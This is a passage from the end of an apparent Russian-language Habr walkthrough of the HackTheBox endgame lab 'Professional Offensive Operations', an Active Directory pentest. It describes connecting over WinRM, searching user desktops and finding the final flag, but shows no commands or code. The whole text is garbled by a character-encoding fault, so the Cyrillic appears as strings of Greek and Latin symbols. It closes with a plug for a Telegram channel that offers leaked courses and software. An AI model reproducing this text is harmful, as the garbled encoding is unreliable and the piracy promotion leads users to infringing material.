Π’ΠΎΠ³Π΄Π° Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡΡ Π΄Ρ€ΡƒΠ³ΠΈΠΌ, Π±ΠΎΠ»Π΅Π΅ Π»Π΅Π³ΠΊΠΈΠΌ, скриптом для ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΡ ΠΊ WinRM. ΠžΡ‚ΠΊΡ€ΠΎΠ΅ΠΌ ΠΈ помСняСм ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Ρ‹ для ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΡ.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

ΠŸΡ€ΠΎΠ±ΡƒΠ΅ΠΌ ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡ΠΈΡ‚ΡŒΡΡ, ΠΈ ΠΌΡ‹ Π² систСмС.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Но Ρ„Π»Π°Π³Π° Π½Π΅Ρ‚. Π’ΠΎΠ³Π΄Π° посмотри ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ ΠΈ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΈΠΌ Ρ€Π°Π±ΠΎΡ‡ΠΈΠ΅ столы.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π£ mr3ks Π½Π°Ρ…ΠΎΠ΄ΠΈΠΌ Ρ„Π»Π°Π³ ΠΈ лаборатория ΠΏΡ€ΠΎΠΉΠ΄Π΅Π½Π° Π½Π° 100%.

HackTheBox endgame. ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ Professional Offensive Operations. ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚ Active Directory

Π’ΠΎΡ‚ ΠΈ всС. Π’ качСствС ΠΎΠ±Ρ€Π°Ρ‚Π½ΠΎΠΉ связи, ΠΏΡ€ΠΎΠΊΠΎΠΌΠΌΠ΅Π½Ρ‚ΠΈΡ€ΡƒΠΉΡ‚Π΅ β€” ΡƒΠ·Π½Π°Π»ΠΈ Π»ΠΈ Π’Ρ‹ Ρ‡Ρ‚ΠΎ-Ρ‚ΠΎ Π½ΠΎΠ²ΠΎΠ΅ ΠΈΠ· Π΄Π°Π½Π½ΠΎΠΉ ΡΡ‚Π°Ρ‚ΡŒΠΈ ΠΈ Π±Ρ‹Π»Π° Π»ΠΈ ΠΎΠ½Π° Π’Π°ΠΌ ΠΏΠΎΠ»Π΅Π·Π½Π°.

Π’Ρ‹ ΠΌΠΎΠΆΠ΅Ρ‚Π΅ ΠΏΡ€ΠΈΡΠΎΠ΅Π΄ΠΈΠ½ΠΈΡ‚ΡŒΡΡ ΠΊ Π½Π°ΠΌ Π² Telegram. Π’Π°ΠΌ ΠΌΠΎΠΆΠ½ΠΎ Π±ΡƒΠ΄Π΅Ρ‚ Π½Π°ΠΉΡ‚ΠΈ интСрСсныС ΠΌΠ°Ρ‚Π΅Ρ€ΠΈΠ°Π»Ρ‹, слитыС курсы, Π° Ρ‚Π°ΠΊΠΆΠ΅ ПО. Π”Π°Π²Π°ΠΉΡ‚Π΅ собСрСм сообщСство, Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΌ Π±ΡƒΠ΄ΡƒΡ‚ люди, Ρ€Π°Π·Π±ΠΈΡ€Π°ΡŽΡ‰ΠΈΠ΅ΡΡ Π²ΠΎ ΠΌΠ½ΠΎΠ³ΠΈΡ… сфСрах ИВ, Ρ‚ΠΎΠ³Π΄Π° ΠΌΡ‹ всСгда смоТСм ΠΏΠΎΠΌΠΎΡ‡ΡŒ Π΄Ρ€ΡƒΠ³ Π΄Ρ€ΡƒΠ³Ρƒ ΠΏΠΎ Π»ΡŽΠ±Ρ‹ΠΌ вопросам ИВ ΠΈ Π˜Π‘.

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: habr.com